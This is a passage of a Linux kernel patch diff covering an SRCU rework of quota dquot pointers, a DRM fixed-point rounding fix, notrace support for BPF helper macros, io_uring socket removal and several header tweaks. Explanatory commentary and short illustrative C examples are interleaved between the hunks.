++				dquots[type], &dquot_srcu,
++				lockdep_is_held(&dq_data_lock));
++
+ #ifdef CONFIG_QUOTA_DEBUG
+ 			if (unlikely(inode_get_rsv_space(inode) > 0))
+ 				reserved = 1;
+ #endif
+-			remove_inode_dquot_ref(inode, type, tofree_head);
++			rcu_assign_pointer(dquots[type], NULL);
++			if (dquot)
++				dqput(dquot);
+ 		}
+ 		spin_unlock(&dq_data_lock);
+ 	}
+@@ -1174,13 +1132,8 @@ static void remove_dquot_ref(struct super_block *sb, int type,
+ /* Gather all references from inodes and drop them */
+ static void drop_dquot_ref(struct super_block *sb, int type)
+ {
+-	LIST_HEAD(tofree_head);
+-
+-	if (sb->dq_op) {
+-		remove_dquot_ref(sb, type, &tofree_head);
+-		synchronize_srcu(&dquot_srcu);
+-		put_dquot_list(&tofree_head);
+-	}
++	if (sb->dq_op)
++		remove_dquot_ref(sb, type);
+ }
+ 
+ static inline
+@@ -1513,7 +1466,8 @@ static int inode_quota_active(const struct inode *inode)
+ static int __dquot_initialize(struct inode *inode, int type)
+ {
+ 	int cnt, init_needed = 0;
+-	struct dquot **dquots, *got[MAXQUOTAS] = {};
++	struct dquot __rcu **dquots;
++	struct dquot *got[MAXQUOTAS] = {};
+ 	struct super_block *sb = inode->i_sb;
+ 	qsize_t rsv;
+ 	int ret = 0;
+@@ -1588,7 +1542,7 @@ static int __dquot_initialize(struct inode *inode, int type)
+ 		if (!got[cnt])
+ 			continue;
+ 		if (!dquots[cnt]) {
+-			dquots[cnt] = got[cnt];
++			rcu_assign_pointer(dquots[cnt], got[cnt]);
+ 			got[cnt] = NULL;
+ 			/*
+ 			 * Make quota reservation system happy if someone
+@@ -1596,12 +1550,16 @@ static int __dquot_initialize(struct inode *inode, int type)
+ 			 */
+ 			rsv = inode_get_rsv_space(inode);
+ 			if (unlikely(rsv)) {
++				struct dquot *dquot = srcu_dereference_check(
++					dquots[cnt], &dquot_srcu,
++					lockdep_is_held(&dq_data_lock));
++
+ 				spin_lock(&inode->i_lock);
+ 				/* Get reservation again under proper lock */
+ 				rsv = __inode_get_rsv_space(inode);
+-				spin_lock(&dquots[cnt]->dq_dqb_lock);
+-				dquots[cnt]->dq_dqb.dqb_rsvspace += rsv;
+-				spin_unlock(&dquots[cnt]->dq_dqb_lock);
++				spin_lock(&dquot->dq_dqb_lock);
++				dquot->dq_dqb.dqb_rsvspace += rsv;
++				spin_unlock(&dquot->dq_dqb_lock);
+ 				spin_unlock(&inode->i_lock);
+ 			}
+ 		}
+@@ -1623,7 +1581,7 @@ EXPORT_SYMBOL(dquot_initialize);
+ 
+ bool dquot_initialize_needed(struct inode *inode)
+ {
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
+ 	int i;
+ 
+ 	if (!inode_quota_active(inode))
+@@ -1648,13 +1606,14 @@ EXPORT_SYMBOL(dquot_initialize_needed);
+ static void __dquot_drop(struct inode *inode)
+ {
+ 	int cnt;
+-	struct dquot **dquots = i_dquot(inode);
++	struct dquot __rcu **dquots = i_dquot(inode);
+ 	struct dquot *put[MAXQUOTAS];
+ 
+ 	spin_lock(&dq_data_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		put[cnt] = dquots[cnt];
+-		dquots[cnt] = NULL;
++		put[cnt] = srcu_dereference_check(dquots[cnt], &dquot_srcu,
++					lockdep_is_held(&dq_data_lock));
++		rcu_assign_pointer(dquots[cnt], NULL);
+ 	}
+ 	spin_unlock(&dq_data_lock);
+ 	dqput_all(put);
+@@ -1662,7 +1621,7 @@ static void __dquot_drop(struct inode *inode)
+ 
+ void dquot_drop(struct inode *inode)
+ {
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
+ 	int cnt;
+ 
+ 	if (IS_NOQUOTA(inode))
+@@ -1735,7 +1694,8 @@ int __dquot_alloc_space(struct inode *inode, qsize_t number, int flags)
+ 	int cnt, ret = 0, index;
+ 	struct dquot_warn warn[MAXQUOTAS];
+ 	int reserve = flags & DQUOT_SPACE_RESERVE;
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 
+ 	if (!inode_quota_active(inode)) {
+ 		if (reserve) {
+@@ -1755,27 +1715,26 @@ int __dquot_alloc_space(struct inode *inode, qsize_t number, int flags)
+ 	index = srcu_read_lock(&dquot_srcu);
+ 	spin_lock(&inode->i_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+ 		if (reserve) {
+-			ret = dquot_add_space(dquots[cnt], 0, number, flags,
+-					      &warn[cnt]);
++			ret = dquot_add_space(dquot, 0, number, flags, &warn[cnt]);
+ 		} else {
+-			ret = dquot_add_space(dquots[cnt], number, 0, flags,
+-					      &warn[cnt]);
++			ret = dquot_add_space(dquot, number, 0, flags, &warn[cnt]);
+ 		}
+ 		if (ret) {
+ 			/* Back out changes we already did */
+ 			for (cnt--; cnt >= 0; cnt--) {
+-				if (!dquots[cnt])
++				dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++				if (!dquot)
+ 					continue;
+-				spin_lock(&dquots[cnt]->dq_dqb_lock);
++				spin_lock(&dquot->dq_dqb_lock);
+ 				if (reserve)
+-					dquot_free_reserved_space(dquots[cnt],
+-								  number);
++					dquot_free_reserved_space(dquot, number);
+ 				else
+-					dquot_decr_space(dquots[cnt], number);
+-				spin_unlock(&dquots[cnt]->dq_dqb_lock);
++					dquot_decr_space(dquot, number);
++				spin_unlock(&dquot->dq_dqb_lock);
+ 			}
+ 			spin_unlock(&inode->i_lock);
+ 			goto out_flush_warn;
+@@ -1805,7 +1764,8 @@ int dquot_alloc_inode(struct inode *inode)
+ {
+ 	int cnt, ret = 0, index;
+ 	struct dquot_warn warn[MAXQUOTAS];
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
++	struct dquot *dquot;
+ 
+ 	if (!inode_quota_active(inode))
+ 		return 0;
+@@ -1816,17 +1776,19 @@ int dquot_alloc_inode(struct inode *inode)
+ 	index = srcu_read_lock(&dquot_srcu);
+ 	spin_lock(&inode->i_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+-		ret = dquot_add_inodes(dquots[cnt], 1, &warn[cnt]);
++		ret = dquot_add_inodes(dquot, 1, &warn[cnt]);
+ 		if (ret) {
+ 			for (cnt--; cnt >= 0; cnt--) {
+-				if (!dquots[cnt])
++				dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++				if (!dquot)
+ 					continue;
+ 				/* Back out changes we already did */
+-				spin_lock(&dquots[cnt]->dq_dqb_lock);
+-				dquot_decr_inodes(dquots[cnt], 1);
+-				spin_unlock(&dquots[cnt]->dq_dqb_lock);
++				spin_lock(&dquot->dq_dqb_lock);
++				dquot_decr_inodes(dquot, 1);
++				spin_unlock(&dquot->dq_dqb_lock);
+ 			}
+ 			goto warn_put_all;
+ 		}
+@@ -1847,7 +1809,8 @@ EXPORT_SYMBOL(dquot_alloc_inode);
+  */
+ int dquot_claim_space_nodirty(struct inode *inode, qsize_t number)
+ {
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 	int cnt, index;
+ 
+ 	if (!inode_quota_active(inode)) {
+@@ -1863,9 +1826,8 @@ int dquot_claim_space_nodirty(struct inode *inode, qsize_t number)
+ 	spin_lock(&inode->i_lock);
+ 	/* Claim reserved quotas to allocated quotas */
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (dquots[cnt]) {
+-			struct dquot *dquot = dquots[cnt];
+-
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (dquot) {
+ 			spin_lock(&dquot->dq_dqb_lock);
+ 			if (WARN_ON_ONCE(dquot->dq_dqb.dqb_rsvspace < number))
+ 				number = dquot->dq_dqb.dqb_rsvspace;
+@@ -1889,7 +1851,8 @@ EXPORT_SYMBOL(dquot_claim_space_nodirty);
+  */
+ void dquot_reclaim_space_nodirty(struct inode *inode, qsize_t number)
+ {
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 	int cnt, index;
+ 
+ 	if (!inode_quota_active(inode)) {
+@@ -1905,9 +1868,8 @@ void dquot_reclaim_space_nodirty(struct inode *inode, qsize_t number)
+ 	spin_lock(&inode->i_lock);
+ 	/* Claim reserved quotas to allocated quotas */
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (dquots[cnt]) {
+-			struct dquot *dquot = dquots[cnt];
+-
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (dquot) {
+ 			spin_lock(&dquot->dq_dqb_lock);
+ 			if (WARN_ON_ONCE(dquot->dq_dqb.dqb_curspace < number))
+ 				number = dquot->dq_dqb.dqb_curspace;
+@@ -1933,7 +1895,8 @@ void __dquot_free_space(struct inode *inode, qsize_t number, int flags)
+ {
+ 	unsigned int cnt;
+ 	struct dquot_warn warn[MAXQUOTAS];
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 	int reserve = flags & DQUOT_SPACE_RESERVE, index;
+ 
+ 	if (!inode_quota_active(inode)) {
+@@ -1954,17 +1917,18 @@ void __dquot_free_space(struct inode *inode, qsize_t number, int flags)
+ 		int wtype;
+ 
+ 		warn[cnt].w_type = QUOTA_NL_NOWARN;
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+-		spin_lock(&dquots[cnt]->dq_dqb_lock);
+-		wtype = info_bdq_free(dquots[cnt], number);
++		spin_lock(&dquot->dq_dqb_lock);
++		wtype = info_bdq_free(dquot, number);
+ 		if (wtype != QUOTA_NL_NOWARN)
+-			prepare_warning(&warn[cnt], dquots[cnt], wtype);
++			prepare_warning(&warn[cnt], dquot, wtype);
+ 		if (reserve)
+-			dquot_free_reserved_space(dquots[cnt], number);
++			dquot_free_reserved_space(dquot, number);
+ 		else
+-			dquot_decr_space(dquots[cnt], number);
+-		spin_unlock(&dquots[cnt]->dq_dqb_lock);
++			dquot_decr_space(dquot, number);
++		spin_unlock(&dquot->dq_dqb_lock);
+ 	}
+ 	if (reserve)
+ 		*inode_reserved_space(inode) -= number;
+@@ -1988,7 +1952,8 @@ void dquot_free_inode(struct inode *inode)
+ {
+ 	unsigned int cnt;
+ 	struct dquot_warn warn[MAXQUOTAS];
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
++	struct dquot *dquot;
+ 	int index;
+ 
+ 	if (!inode_quota_active(inode))
+@@ -1999,16 +1964,16 @@ void dquot_free_inode(struct inode *inode)
+ 	spin_lock(&inode->i_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+ 		int wtype;
+-
+ 		warn[cnt].w_type = QUOTA_NL_NOWARN;
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+-		spin_lock(&dquots[cnt]->dq_dqb_lock);
+-		wtype = info_idq_free(dquots[cnt], 1);
++		spin_lock(&dquot->dq_dqb_lock);
++		wtype = info_idq_free(dquot, 1);
+ 		if (wtype != QUOTA_NL_NOWARN)
+-			prepare_warning(&warn[cnt], dquots[cnt], wtype);
+-		dquot_decr_inodes(dquots[cnt], 1);
+-		spin_unlock(&dquots[cnt]->dq_dqb_lock);
++			prepare_warning(&warn[cnt], dquot, wtype);
++		dquot_decr_inodes(dquot, 1);
++		spin_unlock(&dquot->dq_dqb_lock);
+ 	}
+ 	spin_unlock(&inode->i_lock);
+ 	mark_all_dquot_dirty(dquots);
+@@ -2034,8 +1999,9 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 	qsize_t cur_space;
+ 	qsize_t rsv_space = 0;
+ 	qsize_t inode_usage = 1;
++	struct dquot __rcu **dquots;
+ 	struct dquot *transfer_from[MAXQUOTAS] = {};
+-	int cnt, ret = 0;
++	int cnt, index, ret = 0;
+ 	char is_valid[MAXQUOTAS] = {};
+ 	struct dquot_warn warn_to[MAXQUOTAS];
+ 	struct dquot_warn warn_from_inodes[MAXQUOTAS];
+@@ -2066,6 +2032,7 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 	}
+ 	cur_space = __inode_get_bytes(inode);
+ 	rsv_space = __inode_get_rsv_space(inode);
++	dquots = i_dquot(inode);
+ 	/*
+ 	 * Build the transfer_from list, check limits, and update usage in
+ 	 * the target structures.
+@@ -2080,7 +2047,8 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 		if (!sb_has_quota_active(inode->i_sb, cnt))
+ 			continue;
+ 		is_valid[cnt] = 1;
+-		transfer_from[cnt] = i_dquot(inode)[cnt];
++		transfer_from[cnt] = srcu_dereference_check(dquots[cnt],
++				&dquot_srcu, lockdep_is_held(&dq_data_lock));
+ 		ret = dquot_add_inodes(transfer_to[cnt], inode_usage,
+ 				       &warn_to[cnt]);
+ 		if (ret)
+@@ -2119,13 +2087,21 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 						  rsv_space);
+ 			spin_unlock(&transfer_from[cnt]->dq_dqb_lock);
+ 		}
+-		i_dquot(inode)[cnt] = transfer_to[cnt];
++		rcu_assign_pointer(dquots[cnt], transfer_to[cnt]);
+ 	}
+ 	spin_unlock(&inode->i_lock);
+ 	spin_unlock(&dq_data_lock);
+ 
+-	mark_all_dquot_dirty(transfer_from);
+-	mark_all_dquot_dirty(transfer_to);
++	/*
++	 * These arrays are local and we hold dquot references so we don't need
++	 * the srcu protection but still take dquot_srcu to avoid warning in
++	 * mark_all_dquot_dirty().
++	 */
++	index = srcu_read_lock(&dquot_srcu);
++	mark_all_dquot_dirty((struct dquot __rcu **)transfer_from);
++	mark_all_dquot_dirty((struct dquot __rcu **)transfer_to);
++	srcu_read_unlock(&dquot_srcu, index);
++
+ 	flush_warnings(warn_to);
+ 	flush_warnings(warn_from_inodes);
+ 	flush_warnings(warn_from_space);
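
The dquot rework annotates the per-inode dquot pointers as __rcu and has every reader fetch them with srcu_dereference() inside a dquot_srcu read-side section, while updaters publish or clear slots with rcu_assign_pointer(); the old tofree_head deferral machinery becomes unnecessary because a cleared pointer can simply be dqput() once readers are known to be done. A generic sketch of the pattern, with obj and slot as placeholder names:

	#include <linux/rcupdate.h>
	#include <linux/slab.h>
	#include <linux/srcu.h>

	struct obj { int data; };

	DEFINE_STATIC_SRCU(obj_srcu);
	static struct obj __rcu *slot;

	/* Reader: the pointer is valid only inside the SRCU section. */
	static int read_data(void)
	{
		struct obj *o;
		int idx, val = 0;

		idx = srcu_read_lock(&obj_srcu);
		o = srcu_dereference(slot, &obj_srcu);
		if (o)
			val = o->data;
		srcu_read_unlock(&obj_srcu, idx);
		return val;
	}

	/* Updater: clear the slot, wait out readers, then free. */
	static void clear_slot(void)
	{
		struct obj *old;

		old = rcu_dereference_protected(slot, 1); /* updates serialized by caller */
		rcu_assign_pointer(slot, NULL);
		synchronize_srcu(&obj_srcu);
		kfree(old);
	}
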
+diff --git a/fs/select.c b/fs/select.c
+index 0ee55af1a55c2..d4d881d439dcd 100644
+--- a/fs/select.c
++++ b/fs/select.c
+@@ -476,7 +476,7 @@ static inline void wait_key_set(poll_table *wait, unsigned long in,
+ 		wait->_key |= POLLOUT_SET;
+ }
+ 
+-static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
++static noinline_for_stack int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
+ {
+ 	ktime_t expire, *to = NULL;
+ 	struct poll_wqueues table;
+diff --git a/include/drm/drm_fixed.h b/include/drm/drm_fixed.h
+index 03cb890690e83..a476a406e5997 100644
+--- a/include/drm/drm_fixed.h
++++ b/include/drm/drm_fixed.h
+@@ -70,7 +70,6 @@ static inline u32 dfixed_div(fixed20_12 A, fixed20_12 B)
+ }
+ 
+ #define DRM_FIXED_POINT		32
+-#define DRM_FIXED_POINT_HALF	16
+ #define DRM_FIXED_ONE		(1ULL << DRM_FIXED_POINT)
+ #define DRM_FIXED_DECIMAL_MASK	(DRM_FIXED_ONE - 1)
+ #define DRM_FIXED_DIGITS_MASK	(~DRM_FIXED_DECIMAL_MASK)
+@@ -89,12 +88,12 @@ static inline int drm_fixp2int(s64 a)
+ 
+ static inline int drm_fixp2int_round(s64 a)
+ {
+-	return drm_fixp2int(a + (1 << (DRM_FIXED_POINT_HALF - 1)));
++	return drm_fixp2int(a + DRM_FIXED_ONE / 2);
+ }
+ 
+ static inline int drm_fixp2int_ceil(s64 a)
+ {
+-	if (a > 0)
++	if (a >= 0)
+ 		return drm_fixp2int(a + DRM_FIXED_ALMOST_ONE);
+ 	else
+ 		return drm_fixp2int(a - DRM_FIXED_ALMOST_ONE);
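
drm_fixed.h uses a 32.32 fixed-point format (DRM_FIXED_POINT is 32), but drm_fixp2int_round() was adding 1 << (DRM_FIXED_POINT_HALF - 1) = 1 << 15, one half of a 16-bit fraction; that bias is only 2^15/2^32, about 7.6e-6, so the function effectively truncated instead of rounding. The fix adds DRM_FIXED_ONE / 2, a true one half. (drm_fixp2int_ceil() is also corrected so that exactly zero takes the non-negative branch.) A small userspace demonstration of the difference:

	/* Userspace demo mirroring the drm_fixed.h 32.32 format. */
	#include <stdint.h>
	#include <stdio.h>

	#define FIXED_POINT 32
	#define FIXED_ONE   (1ULL << FIXED_POINT)

	static int fixp2int(int64_t a)  { return a >> FIXED_POINT; }
	/* buggy: adds half of a 16-bit fraction */
	static int round_old(int64_t a) { return fixp2int(a + (1 << 15)); }
	/* fixed: adds one half in 32.32 */
	static int round_new(int64_t a) { return fixp2int(a + FIXED_ONE / 2); }

	int main(void)
	{
		int64_t half = FIXED_ONE / 2;	/* 0.5 in 32.32 */

		printf("0.5 rounds to: old=%d new=%d\n",
		       round_old(half), round_new(half));	/* old=0, new=1 */
		return 0;
	}
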
+diff --git a/include/dt-bindings/clock/r8a779g0-cpg-mssr.h b/include/dt-bindings/clock/r8a779g0-cpg-mssr.h
+index 754c54a6eb06a..7850cdc62e285 100644
+--- a/include/dt-bindings/clock/r8a779g0-cpg-mssr.h
++++ b/include/dt-bindings/clock/r8a779g0-cpg-mssr.h
+@@ -86,5 +86,6 @@
+ #define R8A779G0_CLK_CPEX		74
+ #define R8A779G0_CLK_CBFUSA		75
+ #define R8A779G0_CLK_R			76
++#define R8A779G0_CLK_CP			77
+ 
+ #endif /* __DT_BINDINGS_CLOCK_R8A779G0_CPG_MSSR_H__ */
+diff --git a/include/linux/dm-io.h b/include/linux/dm-io.h
+index 92e7abfe04f92..70b3737052dd2 100644
+--- a/include/linux/dm-io.h
++++ b/include/linux/dm-io.h
+@@ -79,7 +79,8 @@ void dm_io_client_destroy(struct dm_io_client *client);
+  * error occurred doing io to the corresponding region.
+  */
+ int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+-	  struct dm_io_region *region, unsigned int long *sync_error_bits);
++	  struct dm_io_region *region, unsigned int long *sync_error_bits,
++	  unsigned short ioprio);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_IO_H */
+diff --git a/include/linux/exportfs.h b/include/linux/exportfs.h
+index fe848901fcc3a..218fc5c54e901 100644
+--- a/include/linux/exportfs.h
++++ b/include/linux/exportfs.h
+@@ -221,6 +221,7 @@ struct export_operations {
+ #define EXPORT_OP_NOATOMIC_ATTR		(0x10) /* Filesystem cannot supply
+ 						  atomic attribute updates
+ 						*/
++#define EXPORT_OP_FLUSH_ON_CLOSE	(0x20) /* fs flushes file data on close */
+ 	unsigned long	flags;
+ };
+ 
+diff --git a/include/linux/filter.h b/include/linux/filter.h
+index efc42a6e3aed0..face590b24e17 100644
+--- a/include/linux/filter.h
++++ b/include/linux/filter.h
+@@ -495,24 +495,27 @@ static inline bool insn_is_zext(const struct bpf_insn *insn)
+ 	__BPF_MAP(n, __BPF_DECL_ARGS, __BPF_N, u64, __ur_1, u64, __ur_2,       \
+ 		  u64, __ur_3, u64, __ur_4, u64, __ur_5)
+ 
+-#define BPF_CALL_x(x, name, ...)					       \
++#define BPF_CALL_x(x, attr, name, ...)					       \
+ 	static __always_inline						       \
+ 	u64 ____##name(__BPF_MAP(x, __BPF_DECL_ARGS, __BPF_V, __VA_ARGS__));   \
+ 	typedef u64 (*btf_##name)(__BPF_MAP(x, __BPF_DECL_ARGS, __BPF_V, __VA_ARGS__)); \
+-	u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__));	       \
+-	u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__))	       \
++	attr u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__));    \
++	attr u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__))     \
+ 	{								       \
+ 		return ((btf_##name)____##name)(__BPF_MAP(x,__BPF_CAST,__BPF_N,__VA_ARGS__));\
+ 	}								       \
+ 	static __always_inline						       \
+ 	u64 ____##name(__BPF_MAP(x, __BPF_DECL_ARGS, __BPF_V, __VA_ARGS__))
+ 
+-#define BPF_CALL_0(name, ...)	BPF_CALL_x(0, name, __VA_ARGS__)
+-#define BPF_CALL_1(name, ...)	BPF_CALL_x(1, name, __VA_ARGS__)
+-#define BPF_CALL_2(name, ...)	BPF_CALL_x(2, name, __VA_ARGS__)
+-#define BPF_CALL_3(name, ...)	BPF_CALL_x(3, name, __VA_ARGS__)
+-#define BPF_CALL_4(name, ...)	BPF_CALL_x(4, name, __VA_ARGS__)
+-#define BPF_CALL_5(name, ...)	BPF_CALL_x(5, name, __VA_ARGS__)
++#define __NOATTR
++#define BPF_CALL_0(name, ...)	BPF_CALL_x(0, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_1(name, ...)	BPF_CALL_x(1, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_2(name, ...)	BPF_CALL_x(2, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_3(name, ...)	BPF_CALL_x(3, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_4(name, ...)	BPF_CALL_x(4, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_5(name, ...)	BPF_CALL_x(5, __NOATTR, name, __VA_ARGS__)
++
++#define NOTRACE_BPF_CALL_1(name, ...)	BPF_CALL_x(1, notrace, name, __VA_ARGS__)
+ 
+ #define bpf_ctx_range(TYPE, MEMBER)						\
+ 	offsetof(TYPE, MEMBER) ... offsetofend(TYPE, MEMBER) - 1
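
BPF_CALL_x() gains an attribute parameter so the generated helper entry point can carry function attributes: the numbered wrappers pass the empty __NOATTR, and the new NOTRACE_BPF_CALL_1() passes notrace. That is what lets the bpf_spin_lock()/bpf_spin_unlock() helpers further down (kernel/bpf/helpers.c) be excluded from ftrace, so a traced function can no longer recurse into the spinlock helpers. Declaring a helper with the new macro looks like this (bpf_example_touch is a made-up name):

	#include <linux/filter.h>

	/* Expands to roughly: notrace u64 bpf_example_touch(u64 r1, ...) */
	NOTRACE_BPF_CALL_1(bpf_example_touch, void *, ptr)
	{
		return ptr != NULL;
	}
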
+diff --git a/include/linux/io_uring.h b/include/linux/io_uring.h
+index a1484cdb3158e..a8f3058448eaa 100644
+--- a/include/linux/io_uring.h
++++ b/include/linux/io_uring.h
+@@ -42,11 +42,11 @@ void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2,
+ 			unsigned issue_flags);
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+ 			void (*task_work_cb)(struct io_uring_cmd *, unsigned));
+-struct sock *io_uring_get_socket(struct file *file);
+ void __io_uring_cancel(bool cancel_all);
+ void __io_uring_free(struct task_struct *tsk);
+ void io_uring_unreg_ringfd(void);
+ const char *io_uring_get_opcode(u8 opcode);
++bool io_is_uring_fops(struct file *file);
+ 
+ static inline void io_uring_files_cancel(void)
+ {
+@@ -71,6 +71,10 @@ static inline int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ {
+ 	return -EOPNOTSUPP;
+ }
++static inline bool io_is_uring_fops(struct file *file)
++{
++	return false;
++}
+ static inline void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret,
+ 		ssize_t ret2, unsigned issue_flags)
+ {
+@@ -79,10 +83,6 @@ static inline void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+ 			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ }
+-static inline struct sock *io_uring_get_socket(struct file *file)
+-{
+-	return NULL;
+-}
+ static inline void io_uring_task_cancel(void)
+ {
+ }
+diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
+index f5b687a787a34..37aeea266ebb3 100644
+--- a/include/linux/io_uring_types.h
++++ b/include/linux/io_uring_types.h
+@@ -330,9 +330,6 @@ struct io_ring_ctx {
+ 
+ 	struct list_head		io_buffers_pages;
+ 
+-	#if defined(CONFIG_UNIX)
+-		struct socket		*ring_sock;
+-	#endif
+ 	/* hashed buffered write serialization */
+ 	struct io_wq_hash		*hash_map;
+ 
+diff --git a/include/linux/mlx5/qp.h b/include/linux/mlx5/qp.h
+index 4657d5c54abef..ca0eee571ad7b 100644
+--- a/include/linux/mlx5/qp.h
++++ b/include/linux/mlx5/qp.h
+@@ -269,7 +269,10 @@ struct mlx5_wqe_eth_seg {
+ 	union {
+ 		struct {
+ 			__be16 sz;
+-			u8     start[2];
++			union {
++				u8     start[2];
++				DECLARE_FLEX_ARRAY(u8, data);
++			};
+ 		} inline_hdr;
+ 		struct {
+ 			__be16 type;
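
The mlx5 change overlays a flexible-array view on the fixed 2-byte inline_hdr.start[] via DECLARE_FLEX_ARRAY(), so code copying a full inline packet header writes through an open-ended member instead of what FORTIFY_SOURCE/UBSAN would treat as an overflow of a 2-byte array. The general shape of the idiom, with illustrative names:

	#include <asm/byteorder.h>
	#include <linux/stddef.h>
	#include <linux/string.h>
	#include <linux/types.h>

	struct inline_hdr {
		__be16 sz;				/* bytes of inlined data */
		union {
			u8 start[2];			/* legacy fixed-size view */
			DECLARE_FLEX_ARRAY(u8, data);	/* open-ended view */
		};
	};

	static void fill_hdr(struct inline_hdr *hdr, const void *pkt, u16 len)
	{
		hdr->sz = cpu_to_be16(len);
		/* flex-array destination: no bogus fortified-memcpy warning */
		memcpy(hdr->data, pkt, len);
	}
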
+diff --git a/include/linux/moduleloader.h b/include/linux/moduleloader.h
+index 1322652a9d0d9..7dc186ec52a29 100644
+--- a/include/linux/moduleloader.h
++++ b/include/linux/moduleloader.h
+@@ -95,6 +95,14 @@ int module_finalize(const Elf_Ehdr *hdr,
+ 		    const Elf_Shdr *sechdrs,
+ 		    struct module *mod);
+ 
++#ifdef CONFIG_MODULES
++void flush_module_init_free_work(void);
++#else
++static inline void flush_module_init_free_work(void)
++{
++}
++#endif
++
+ /* Any cleanup needed when module leaves. */
+ void module_arch_cleanup(struct module *mod);
+ 
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index eccaf1abea79d..f5d89a4b811f1 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -2355,6 +2355,11 @@ static inline struct pci_dev *pcie_find_root_port(struct pci_dev *dev)
+ 	return NULL;
+ }
+ 
++static inline bool pci_dev_is_disconnected(const struct pci_dev *dev)
++{
++	return dev->error_state == pci_channel_io_perm_failure;
++}
++
+ void pci_request_acs(void);
+ bool pci_acs_enabled(struct pci_dev *pdev, u16 acs_flags);
+ bool pci_acs_path_enabled(struct pci_dev *start,
+diff --git a/include/linux/poll.h b/include/linux/poll.h
+index a9e0e1c2d1f2f..d1ea4f3714a84 100644
+--- a/include/linux/poll.h
++++ b/include/linux/poll.h
+@@ -14,11 +14,7 @@
+ 
+ /* ~832 bytes of stack space used max in sys_select/sys_poll before allocating
+    additional memory. */
+-#ifdef __clang__
+-#define MAX_STACK_ALLOC 768
+-#else
+ #define MAX_STACK_ALLOC 832
+-#endif
+ #define FRONTEND_STACK_ALLOC	256
+ #define SELECT_STACK_ALLOC	FRONTEND_STACK_ALLOC
+ #define POLL_STACK_ALLOC	FRONTEND_STACK_ALLOC
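
These two hunks belong together: marking do_select() noinline_for_stack keeps its large poll_wqueues frame out of core_sys_select(), which removes the reason clang builds needed the smaller 768-byte MAX_STACK_ALLOC, so the #ifdef __clang__ special case can go. The attribute is just noinline spelled to document intent; a sketch of the pattern, with illustrative names:

	#include <linux/compiler.h>
	#include <linux/string.h>
	#include <linux/types.h>

	/*
	 * Without this, the compiler may inline the helper and fold its
	 * 512-byte buffer into every caller's stack frame.
	 */
	static noinline_for_stack int fill_scratch(char *out, size_t len)
	{
		char scratch[512];

		memset(scratch, 0xa5, sizeof(scratch));
		memcpy(out, scratch, len < sizeof(scratch) ? len : sizeof(scratch));
		return 0;
	}
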
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index d2507168b9c7b..319698087d66a 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -268,6 +268,37 @@ do { \
+ 	cond_resched(); \
+ } while (0)
+ 
++/**
++ * rcu_softirq_qs_periodic - Report RCU and RCU-Tasks quiescent states
++ * @old_ts: jiffies at start of processing.
++ *
++ * This helper is for long-running softirq handlers, such as NAPI threads in
++ * networking. The caller should initialize the variable passed in as @old_ts
++ * at the beginning of the softirq handler. When invoked frequently, this macro
++ * will invoke rcu_softirq_qs() every 100 milliseconds thereafter, which will
++ * provide both RCU and RCU-Tasks quiescent states. Note that this macro
